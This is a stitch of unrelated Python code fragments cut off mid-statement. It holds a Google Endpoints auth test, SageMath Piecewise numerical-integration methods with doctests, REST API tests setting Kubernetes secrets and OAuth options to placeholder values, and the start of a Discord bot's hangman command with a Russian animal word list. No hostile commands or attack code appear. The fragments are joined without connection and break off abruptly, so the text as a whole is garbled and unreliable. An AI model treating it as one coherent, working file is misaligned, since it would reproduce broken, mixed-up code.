iata = messages.StringField(1, required=True)
name = messages.StringField(2, required=True)
@api_config.api(
name='iata', version='v1', scopes=[SCOPE],
auth_level=api_config.AUTH_LEVEL.REQUIRED,
allowed_client_ids=users_id_token.SKIP_CLIENT_ID_CHECK)
class IataApi(remote.Service):
@api_config.method(
IATA_RESOURCE,
Airport,
path='airport/{iata}',
http_method='GET',
name='get_airport')
def get_airport(self, request):
return Airport(iata=request.iata, name='irrelevant')
doc = self.generator.get_discovery_doc([IataApi])
auth = doc['auth']
assert auth == {
'oauth2': {
'scopes': {
SCOPE.scope: {
'description': SCOPE.description
}
}
}
}
class | |
EXAMPLES::
sage: f1(x) = 1
sage: f2(x) = 1 - x
sage: f = Piecewise([[(0,1),f1],[(1,2),f2]])
doctest:...: DeprecationWarning: use lower-case piecewise instead
See http://trac.sagemath.org/14801 for details.
sage: f.extend_by_zero_to(-1, 3)
doctest:...: DeprecationWarning: use lower-case piecewise instead
See http://trac.sagemath.org/14801 for details.
Piecewise defined function with 4 parts, [[(-1, 0), 0], [(0, 1), x |--> 1], [(1, 2), x |--> -x + 1], [(2, 3), 0]]
"""
zero = QQ['x'](0)
list_of_pairs = self.list()
a, b = self.domain()
if xmin < a:
list_of_pairs = [[(xmin, a), zero]] + list_of_pairs
if xmax > b:
list_of_pairs = list_of_pairs + [[(b, xmax), zero]]
return Piecewise(list_of_pairs)
def unextend(self):
"""
This removes any parts in the front or back of the function which
is zero (the inverse to extend_by_zero_to).
EXAMPLES::
sage: R.<x> = QQ[]
sage: f = Piecewise([[(-3,-1),1+2+x],[(-1,1),1-x^2]])
doctest:...: DeprecationWarning: use lower-case piecewise instead
See http://trac.sagemath.org/14801 for details.
sage: e = f.extend_by_zero_to(-10,10); e
Piecewise defined function with 4 parts, [[(-10, -3), 0], [(-3, -1), x + 3], [(-1, 1), -x^2 + 1], [(1, 10), 0]]
sage: d = e.unextend(); d
doctest:...: DeprecationWarning: use lower-case piecewise instead
See http://trac.sagemath.org/14801 for details.
Piecewise defined function with 2 parts, [[(-3, -1), x + 3], [(-1, 1), -x^2 + 1]]
sage: d==f
True
"""
list_of_pairs = self.list()
funcs = self.functions()
if funcs[0] == 0:
list_of_pairs = list_of_pairs[1:]
if funcs[-1] == 0:
list_of_pairs = list_of_pairs[:-1]
return Piecewise(list_of_pairs)
def _riemann_sum_helper(self, N, func, initial=0):
"""
A helper function for computing Riemann sums.
INPUT:
- ``N`` - the number of subdivisions
- ``func`` - a function to apply to the endpoints of
each subdivision
- ``initial`` - the starting value
EXAMPLES::
sage: f1(x) = x^2 ## example 1
sage: f2(x) = 5-x^2
sage: f = Piecewise([[(0,1),f1],[(1,2),f2]])
doctest:...: DeprecationWarning: use lower-case piecewise instead
See http://trac.sagemath.org/14801 for details.
sage: f._riemann_sum_helper(6, lambda x0, x1: (x1-x0)*f(x1))
19/6
"""
a,b = self.domain()
rsum = initial
h = (b-a)/N
for i in range(N):
x0 = a+i*h
x1 = a+(i+1)*h
rsum += func(x0, x1)
return rsum
def riemann_sum_integral_approximation(self,N,mode=None):
"""
Returns the piecewise line function defined by the Riemann sums in
numerical integration based on a subdivision into N subintervals.
Set mode="midpoint" for the height of the rectangles to be
determined by the midpoint of the subinterval; set mode="right" for
the height of the rectangles to be determined by the right-hand
endpoint of the subinterval; the default is mode="left" (the height
of the rectangles to be determined by the left-hand endpoint of
the subinterval).
EXAMPLES::
sage: f1(x) = x^2 ## example 1
sage: f2(x) = 5-x^2
sage: f = Piecewise([[(0,1),f1],[(1,2),f2]])
doctest:...: DeprecationWarning: use lower-case piecewise instead
See http://trac.sagemath.org/14801 for details.
sage: f.riemann_sum_integral_approximation(6)
17/6
sage: f.riemann_sum_integral_approximation(6,mode="right")
19/6
sage: f.riemann_sum_integral_approximation(6,mode="midpoint")
3
sage: f.integral(definite=True)
3
"""
if mode is None:
return self._riemann_sum_helper(N, lambda x0, x1: (x1-x0)*self(x0))
elif mode == "right":
return self._riemann_sum_helper(N, lambda x0, x1: (x1-x0)*self(x1))
elif mode == "midpoint":
return self._riemann_sum_helper(N, lambda x0, x1: (x1-x0)*self((x0+x1)/2))
else:
raise ValueError, "invalid mode"
def riemann_sum(self,N,mode=None):
"""
Returns the piecewise line function defined by the Riemann sums in
numerical integration based on a subdivision into N subintervals.
Set mode="midpoint" for the height of the rectangles to be
determined by the midpoint of the subinterval; set mode="right" for
the height of the rectangles to be determined by the right-hand
endpoint of the subinterval; the default is mode="left" (the height
of the rectangles to be determined by the left-hand endpoint of
the subinterval).
EXAMPLES::
sage: f1(x) = x^2
sage: f2(x) = 5-x^2
sage: f = Piecewise([[(0,1),f1],[(1,2),f2]])
doctest:...: DeprecationWarning: use lower-case piecewise instead
See http://trac.sagemath.org/14801 for details.
sage: f.riemann_sum(6,mode="midpoint")
doctest:...: DeprecationWarning: use lower-case piecewise instead
See http://trac.sagemath.org/14801 for details.
Piecewise defined function with 6 parts, [[(0, 1/3), 1/36], [(1/3, 2/3), 1/4], [(2/3, 1), 25/36], [(1, 4/3), 131/36], [(4/3, 5/3), 11/4], [(5/3, 2), 59/36]]
::
sage: f = Piecewise([[(-1,1),(1-x^2).function(x)]])
sage: rsf = f.riemann_sum(7)
sage: P = f.plot(rgbcolor=(0.7,0.1,0.5), plot_points=40)
sage: Q = rsf.plot(rgbcolor=(0.7,0.6,0.6), plot_points=40)
sage: L = add([line([[a,0],[a,f(x=a)]],rgbcolor=(0.7,0.6,0.6)) for (a,b),f in rsf.list()])
sage: P + Q + L
Graphics object consisting of 15 graphics primitives
::
sage: f = Piecewise([[(-1,1),(1/2+x-x^3)]], x) ## example 3
sage: rsf = f.riemann_sum(8)
sage: P = f.plot(rgbcolor=(0.7,0.1,0.5), plot_points=40)
sage: Q = rsf.plot(rgbcolor=(0.7,0.6,0.6), plot_points=40)
sage: L = add([line([[a,0],[a,f(x=a)]],rgbcolor=(0.7,0.6,0.6)) for (a,b),f in rsf.list()])
sage: P + Q + L
Graphics object consisting of 17 graphics primitives
"""
if mode is None:
rsum = self._riemann_sum_helper(N, lambda x0,x1: [[(x0,x1),SR(self(x0))]],
initial=[])
elif mode == "right":
rsum = self._riemann_sum_helper(N, lambda x0,x1: [[(x0,x1),SR(self(x1))]],
initial=[])
elif mode == "midpoint":
rsum = self._riemann_sum_helper(N, lambda x0,x1: [[(x0,x1),SR(self((x0+x1)/2))]],
initial=[])
else:
raise ValueError, "invalid mode"
return Piecewise(rsum)
def trapezoid(self,N):
"""
Returns the piecewise line function defined by the trapezoid rule
for numerical integration based on a subdivision into N
subintervals.
EXAMPLES::
sage: R.<x> = QQ[]
sage: f1 = x^2
sage: f2 = 5-x^2
sage: f = Piecewise([[(0,1),f1],[(1,2),f2]])
doctest:...: DeprecationWarning: use lower-case piecewise instead
See http://trac.sagemath.org/14801 for details.
sage: f.trapezoid(4)
doctest:...: DeprecationWarning: use lower-case piecewise instead
See http://trac.sagemath.org/14801 for details.
Piecewise defined function with 4 parts, [[(0, 1/2), 1/2*x], [(1/2, 1), 9/2*x - 2], [(1, 3/2), 1/2*x + 2], [(3/2, 2), -7/2*x + 8]]
::
sage: R.<x> = QQ[]
sage: f = Piecewise([[(-1,1),1-x^2]])
sage: tf = f.trapezoid(4)
sage: P = f.plot(rgbcolor=(0.7,0.1,0.5), plot_points=40)
sage: Q = tf.plot(rgbcolor=(0.7,0.6,0.6), plot_points=40)
sage: L = add([line([[a,0],[a,f(a)]],rgbcolor=(0.7,0.6,0.6)) for (a,b),f in tf.list()])
sage: P+Q+L
Graphics object consisting of 9 graphics primitives
::
sage: R.<x> = QQ[]
sage: f = Piecewise([[(-1,1),1/2+x-x^3]]) ## example 3
sage: tf = f.trapezoid(6)
sage: P = f.plot(rgbcolor=(0.7,0.1,0.5), plot_points=40)
sage: Q = tf.plot(rgbcolor=(0.7,0.6,0.6), plot_points=40)
sage: L = add([line([[a,0],[a,f(a)]],rgbcolor=(0.7,0.6,0.6)) for (a,b),f in tf.list()])
sage: P+Q+L
Graphics object consisting of 13 graphics primitives
TESTS:
Use variables other than x (:trac:`13836`)::
sage: R.<y> = QQ[]
sage: f1 = y^2
sage: f2 = 5-y^2
sage: f = Piecewise([[(0,1),f1],[(1,2),f2]])
sage: f.trapezoid(4)
Piecewise defined function with 4 parts, [[(0, 1/2), 1/2*y], [(1/2, 1), 9/2*y - 2], [(1, 3/2), 1/2*y + 2], [(3/2, 2), -7/2*y + 8]]
"""
x = QQ[self.default_variable()].gen()
def f(x0, x1):
f0, f1 = self(x0), self(x1)
return [[(x0,x1),f0+(f1-f0)*(x1-x0)**(-1)*(x-x0)]]
rsum = self._riemann_sum_helper(N, f, initial=[])
return Piecewise(rsum)
def trapezoid_integral_approximation(self,N):
"""
Returns the approximation given by the trapezoid rule for numerical
integration based on a subdivision into N subintervals.
EXAMPLES::
sage: f1(x) = x^2 ## example 1
sage: f2(x) = 1-(1-x)^2
sage: f = Piecewise([[(0,1),f1],[(1,2),f2]])
doctest:...: DeprecationWarning: use lower-case piecewise instead
See http://trac.sagemath.org/14801 for details.
sage: P = f.plot(rgbcolor=(0.7,0.1,0.5), plot_points=40)
sage: tf = f.trapezoid(6)
sage: Q = tf.plot(rgbcolor=(0.7,0.6,0.6), plot_points=40)
sage: ta = f.trapezoid_integral_approximation(6)
sage: t = text('trapezoid approximation = %s'%ta, (1.5, 0.25))
sage: a = f.integral(definite=True)
sage: tt = text('area under curve = %s'%a, (1.5, -0.5))
sage: P + Q + t + tt
Graphics object consisting of 10 graphics primitives
::
sage: f = Piecewise([[(0,1),f1],[(1,2),f2]]) ## example 2
sage: tf = f.trapezoid(4)
sage: ta = f.trapezoid_integral_approximation(4)
sage: Q = tf.plot(rgbcolor=(0.7,0.6,0.6), plot_points=40)
sage: t = text('trapezoid approximation = %s'%ta, (1.5, 0.25))
sage: a = f.integral(definite=True)
sage: tt = text('area under curve = %s'%a, (1.5, -0.5))
sage: P+Q+t+tt
Graphics object consisting of 8 graphics primitives
"""
def f(x0, x1):
f0, f1 = self(x0), self(x1)
return ((f1+f0)/2)*(x1-x0)
return self._riemann_sum_helper(N, f)
def critical_points(self):
"""
Return the critical points of this piecewise function.
.. warning::
Uses maxima, which prints the warning to use results with
caution. Only works for piecewise functions whose parts are
polynomials with real critical not occurring on the
interval endpoints.
EXAMPLES::
sage: R.<x> = QQ[]
sage: f1 = x^0
sage: f2 = 10*x - x^2
sage: f3 = 3*x^4 - 156*x^3 + 3036*x^2 - 26208*x
sage: f = Piecewise([[(0,3),f1],[(3,10),f2],[(10,20),f3]])
doctest:...: DeprecationWarning: use lower-case piecewise instead
See http://trac.sagemath.org/14801 for details.
sage: expected = [5, 12, 13, 14]
sage: all(abs(e-a) < 0.001 for e,a in zip(expected, f.critical_points()))
True
TESTS:
Use variables other than x (:trac:`13836`)::
sage: | |
self.auth_client.get(self.url + '?keys={}'.format(
k8s_config_maps.K8S_CONFIG_MAPS_JOBS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(k8s_config_maps.K8S_CONFIG_MAPS_JOBS, to_dict=True)
assert resp.data[0]['value'] == data
# Experiment
resp = self.auth_client.get(self.url + '?keys={}'.format(
k8s_config_maps.K8S_CONFIG_MAPS_EXPERIMENTS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(k8s_config_maps.K8S_CONFIG_MAPS_EXPERIMENTS, to_dict=True)
assert resp.data[0]['value'] is None
# Update node selectors
resp = self.auth_client.post(self.url, data={
k8s_config_maps.K8S_CONFIG_MAPS_EXPERIMENTS: data
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
k8s_config_maps.K8S_CONFIG_MAPS_EXPERIMENTS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(k8s_config_maps.K8S_CONFIG_MAPS_EXPERIMENTS, to_dict=True)
assert resp.data[0]['value'] == data
# Notebook
resp = self.auth_client.get(self.url + '?keys={}'.format(
k8s_config_maps.K8S_CONFIG_MAPS_NOTEBOOKS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(k8s_config_maps.K8S_CONFIG_MAPS_NOTEBOOKS, to_dict=True)
assert resp.data[0]['value'] is None
# Update node selectors
resp = self.auth_client.post(self.url, data={
k8s_config_maps.K8S_CONFIG_MAPS_NOTEBOOKS: data
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
k8s_config_maps.K8S_CONFIG_MAPS_NOTEBOOKS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(k8s_config_maps.K8S_CONFIG_MAPS_NOTEBOOKS, to_dict=True)
assert resp.data[0]['value'] == data
# Tensorboard
resp = self.auth_client.get(self.url + '?keys={}'.format(
k8s_config_maps.K8S_CONFIG_MAPS_TENSORBOARDS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(k8s_config_maps.K8S_CONFIG_MAPS_TENSORBOARDS,
to_dict=True)
assert resp.data[0]['value'] is None
# Update node selectors
resp = self.auth_client.post(self.url, data={
k8s_config_maps.K8S_CONFIG_MAPS_TENSORBOARDS: data
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
k8s_config_maps.K8S_CONFIG_MAPS_TENSORBOARDS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(k8s_config_maps.K8S_CONFIG_MAPS_TENSORBOARDS,
to_dict=True)
assert resp.data[0]['value'] == data
def test_secrets(self):
data = ['secret1', 'secret2']
# Build
resp = self.auth_client.get(self.url + '?keys={}'.format(
k8s_secrets.K8S_SECRETS_BUILD_JOBS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(k8s_secrets.K8S_SECRETS_BUILD_JOBS, to_dict=True)
assert resp.data[0]['value'] is None
resp = self.auth_client.post(self.url, data={
k8s_secrets.K8S_SECRETS_BUILD_JOBS: data
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
k8s_secrets.K8S_SECRETS_BUILD_JOBS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(k8s_secrets.K8S_SECRETS_BUILD_JOBS, to_dict=True)
assert resp.data[0]['value'] == data
# Job
resp = self.auth_client.get(self.url + '?keys={}'.format(
k8s_secrets.K8S_SECRETS_JOBS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(k8s_secrets.K8S_SECRETS_JOBS, to_dict=True)
assert resp.data[0]['value'] is None
# Update node selectors
resp = self.auth_client.post(self.url, data={
k8s_secrets.K8S_SECRETS_JOBS: data
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
k8s_secrets.K8S_SECRETS_JOBS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(k8s_secrets.K8S_SECRETS_JOBS, to_dict=True)
assert resp.data[0]['value'] == data
# Experiment
resp = self.auth_client.get(self.url + '?keys={}'.format(
k8s_secrets.K8S_SECRETS_EXPERIMENTS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(k8s_secrets.K8S_SECRETS_EXPERIMENTS, to_dict=True)
assert resp.data[0]['value'] is None
# Update node selectors
resp = self.auth_client.post(self.url, data={
k8s_secrets.K8S_SECRETS_EXPERIMENTS: data
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
k8s_secrets.K8S_SECRETS_EXPERIMENTS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(k8s_secrets.K8S_SECRETS_EXPERIMENTS, to_dict=True)
assert resp.data[0]['value'] == data
# Notebook
resp = self.auth_client.get(self.url + '?keys={}'.format(
k8s_secrets.K8S_SECRETS_NOTEBOOKS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(k8s_secrets.K8S_SECRETS_NOTEBOOKS, to_dict=True)
assert resp.data[0]['value'] is None
# Update node selectors
resp = self.auth_client.post(self.url, data={
k8s_secrets.K8S_SECRETS_NOTEBOOKS: data
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
k8s_secrets.K8S_SECRETS_NOTEBOOKS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(k8s_secrets.K8S_SECRETS_NOTEBOOKS, to_dict=True)
assert resp.data[0]['value'] == data
# Tensorboard
resp = self.auth_client.get(self.url + '?keys={}'.format(
k8s_secrets.K8S_SECRETS_TENSORBOARDS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(k8s_secrets.K8S_SECRETS_TENSORBOARDS,
to_dict=True)
assert resp.data[0]['value'] is None
# Update node selectors
resp = self.auth_client.post(self.url, data={
k8s_secrets.K8S_SECRETS_TENSORBOARDS: data
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
k8s_secrets.K8S_SECRETS_TENSORBOARDS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(k8s_secrets.K8S_SECRETS_TENSORBOARDS,
to_dict=True)
assert resp.data[0]['value'] == data
def test_env_vars(self):
data = [['key1', 'value1'], ['key2', 'value2']]
# Build
resp = self.auth_client.get(self.url + '?keys={}'.format(
env_vars.ENV_VARS_BUILD_JOBS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(env_vars.ENV_VARS_BUILD_JOBS, to_dict=True)
assert resp.data[0]['value'] is None
resp = self.auth_client.post(self.url, data={
env_vars.ENV_VARS_BUILD_JOBS: data
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
env_vars.ENV_VARS_BUILD_JOBS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(env_vars.ENV_VARS_BUILD_JOBS, to_dict=True)
assert resp.data[0]['value'] == data
# Job
resp = self.auth_client.get(self.url + '?keys={}'.format(
env_vars.ENV_VARS_JOBS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(env_vars.ENV_VARS_JOBS, to_dict=True)
assert resp.data[0]['value'] is None
# Update node selectors
resp = self.auth_client.post(self.url, data={
env_vars.ENV_VARS_JOBS: data
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
env_vars.ENV_VARS_JOBS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(env_vars.ENV_VARS_JOBS, to_dict=True)
assert resp.data[0]['value'] == data
# Experiment
resp = self.auth_client.get(self.url + '?keys={}'.format(
env_vars.ENV_VARS_EXPERIMENTS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(env_vars.ENV_VARS_EXPERIMENTS, to_dict=True)
assert resp.data[0]['value'] is None
# Update node selectors
resp = self.auth_client.post(self.url, data={
env_vars.ENV_VARS_EXPERIMENTS: data
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
env_vars.ENV_VARS_EXPERIMENTS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(env_vars.ENV_VARS_EXPERIMENTS, to_dict=True)
assert resp.data[0]['value'] == data
# Notebook
resp = self.auth_client.get(self.url + '?keys={}'.format(
env_vars.ENV_VARS_NOTEBOOKS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(env_vars.ENV_VARS_NOTEBOOKS, to_dict=True)
assert resp.data[0]['value'] is None
# Update node selectors
resp = self.auth_client.post(self.url, data={
env_vars.ENV_VARS_NOTEBOOKS: data
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
env_vars.ENV_VARS_NOTEBOOKS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(env_vars.ENV_VARS_NOTEBOOKS, to_dict=True)
assert resp.data[0]['value'] == data
# Tensorboard
resp = self.auth_client.get(self.url + '?keys={}'.format(
env_vars.ENV_VARS_TENSORBOARDS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(env_vars.ENV_VARS_TENSORBOARDS,
to_dict=True)
assert resp.data[0]['value'] is None
# Update node selectors
resp = self.auth_client.post(self.url, data={
env_vars.ENV_VARS_TENSORBOARDS: data
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
env_vars.ENV_VARS_TENSORBOARDS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(env_vars.ENV_VARS_TENSORBOARDS,
to_dict=True)
assert resp.data[0]['value'] == data
def test_auth_github(self):
# enabled
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_github.AUTH_GITHUB_ENABLED))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_github.AUTH_GITHUB_ENABLED, to_dict=True)
assert resp.data[0]['value'] is False
resp = self.auth_client.post(self.url, data={
auth_github.AUTH_GITHUB_ENABLED: True
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_github.AUTH_GITHUB_ENABLED))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_github.AUTH_GITHUB_ENABLED, to_dict=True)
assert resp.data[0]['value'] is True
# client id
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_github.AUTH_GITHUB_VERIFICATION_SCHEDULE))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_github.AUTH_GITHUB_VERIFICATION_SCHEDULE, to_dict=True)
assert resp.data[0]['value'] == 0
resp = self.auth_client.post(self.url, data={
auth_github.AUTH_GITHUB_VERIFICATION_SCHEDULE: 2
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_github.AUTH_GITHUB_VERIFICATION_SCHEDULE))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_github.AUTH_GITHUB_VERIFICATION_SCHEDULE, to_dict=True)
assert resp.data[0]['value'] == 2
# client id
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_github.AUTH_GITHUB_CLIENT_ID))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_github.AUTH_GITHUB_CLIENT_ID, to_dict=True)
assert resp.data[0]['value'] is None
resp = self.auth_client.post(self.url, data={
auth_github.AUTH_GITHUB_CLIENT_ID: 'foobar'
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_github.AUTH_GITHUB_CLIENT_ID))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_github.AUTH_GITHUB_CLIENT_ID, to_dict=True)
assert resp.data[0]['value'] == 'foobar'
# client secret
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_github.AUTH_GITHUB_CLIENT_SECRET))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_github.AUTH_GITHUB_CLIENT_SECRET, to_dict=True)
assert resp.data[0]['value'] is None
resp = self.auth_client.post(self.url, data={
auth_github.AUTH_GITHUB_CLIENT_SECRET: 'foobar'
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_github.AUTH_GITHUB_CLIENT_SECRET))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_github.AUTH_GITHUB_CLIENT_SECRET, to_dict=True)
assert resp.data[0]['value'] == 'foobar'
def test_auth_bitbucket(self):
# enabled
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_bitbucket.AUTH_BITBUCKET_ENABLED))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_bitbucket.AUTH_BITBUCKET_ENABLED, to_dict=True)
assert resp.data[0]['value'] is False
resp = self.auth_client.post(self.url, data={
auth_bitbucket.AUTH_BITBUCKET_ENABLED: True
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_bitbucket.AUTH_BITBUCKET_ENABLED))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_bitbucket.AUTH_BITBUCKET_ENABLED, to_dict=True)
assert resp.data[0]['value'] is True
# client id
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_bitbucket.AUTH_BITBUCKET_VERIFICATION_SCHEDULE))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_bitbucket.AUTH_BITBUCKET_VERIFICATION_SCHEDULE,
to_dict=True)
assert resp.data[0]['value'] == 0
resp = self.auth_client.post(self.url, data={
auth_bitbucket.AUTH_BITBUCKET_VERIFICATION_SCHEDULE: 2
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_bitbucket.AUTH_BITBUCKET_VERIFICATION_SCHEDULE))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_bitbucket.AUTH_BITBUCKET_VERIFICATION_SCHEDULE,
to_dict=True)
assert resp.data[0]['value'] == 2
# client id
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_bitbucket.AUTH_BITBUCKET_CLIENT_ID))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_bitbucket.AUTH_BITBUCKET_CLIENT_ID, to_dict=True)
assert resp.data[0]['value'] is None
resp = self.auth_client.post(self.url, data={
auth_bitbucket.AUTH_BITBUCKET_CLIENT_ID: 'foobar'
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_bitbucket.AUTH_BITBUCKET_CLIENT_ID))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_bitbucket.AUTH_BITBUCKET_CLIENT_ID, to_dict=True)
assert resp.data[0]['value'] == 'foobar'
# client secret
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_bitbucket.AUTH_BITBUCKET_CLIENT_SECRET))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_bitbucket.AUTH_BITBUCKET_CLIENT_SECRET, to_dict=True)
assert resp.data[0]['value'] is None
resp = self.auth_client.post(self.url, data={
auth_bitbucket.AUTH_BITBUCKET_CLIENT_SECRET: 'foobar'
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_bitbucket.AUTH_BITBUCKET_CLIENT_SECRET))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_bitbucket.AUTH_BITBUCKET_CLIENT_SECRET, to_dict=True)
assert resp.data[0]['value'] == 'foobar'
def test_auth_gitlab(self):
# enabled
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_gitlab.AUTH_GITLAB_ENABLED))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_gitlab.AUTH_GITLAB_ENABLED, to_dict=True)
assert resp.data[0]['value'] is False
resp = self.auth_client.post(self.url, data={
auth_gitlab.AUTH_GITLAB_ENABLED: True
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_gitlab.AUTH_GITLAB_ENABLED))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_gitlab.AUTH_GITLAB_ENABLED, to_dict=True)
assert resp.data[0]['value'] is True
# client id
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_gitlab.AUTH_GITLAB_VERIFICATION_SCHEDULE))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_gitlab.AUTH_GITLAB_VERIFICATION_SCHEDULE, to_dict=True)
assert resp.data[0]['value'] == 0
resp = self.auth_client.post(self.url, data={
auth_gitlab.AUTH_GITLAB_VERIFICATION_SCHEDULE: 2
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_gitlab.AUTH_GITLAB_VERIFICATION_SCHEDULE))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_gitlab.AUTH_GITLAB_VERIFICATION_SCHEDULE, to_dict=True)
assert resp.data[0]['value'] == 2
# client id
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_gitlab.AUTH_GITLAB_CLIENT_ID))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_gitlab.AUTH_GITLAB_CLIENT_ID, to_dict=True)
assert | |
element in enumerate(result):
try:
user = await self.client.fetch_user(element)
a = user.name
except AttributeError:
a = '?'
embed.add_field(name=str(int(index + 1)),
value=f"``{random.choice(kamo)}`` | {a} - {result[element]['money']} {emoji}",
inline=False)
await ctx.send(embed=embed)
@commands.command(name='hangman', aliases=['hg'])
async def hangman(self, ctx):
author = ctx.author
member_id = str(author.id)
word_list = ['питон',
'анаконда',
'змея',
'сова',
'мышь',
'пчела',
'шершень',
'собака',
'хорек',
'кошка',
'афалина',
'баран',
'нерпа',
'бабуин',
'аплодонтия',
'вол',
'верблюд',
'ремнезуб',
'бегемот',
'барсук',
'белка',
'гиббон',
'белуха',
'медведь',
'бизон',
'бобер',
'муравьед',
'кенгуру',
'валлаби',
'бонго',
'буйвол',
'гиена',
'бурозубка',
'бурундук',
'викунья',
'мангуст',
'волк',
'вомбат',
'выхухоль',
'газель',
'гамадрил',
'гепард',
'геренук',
'мартышка',
'песец',
'кит',
'горилла',
'зебра',
'тапир',
'гринда',
'гуанако',
'горностай',
'дельфин',
'жираф',
'дикдик',
'кабан',
'дзерен',
'осел',
'динго',
'кенгуру',
'норка',
'долгопят',
'еж',
'зубр',
'ирбис',
'тигр',
'какомицли',
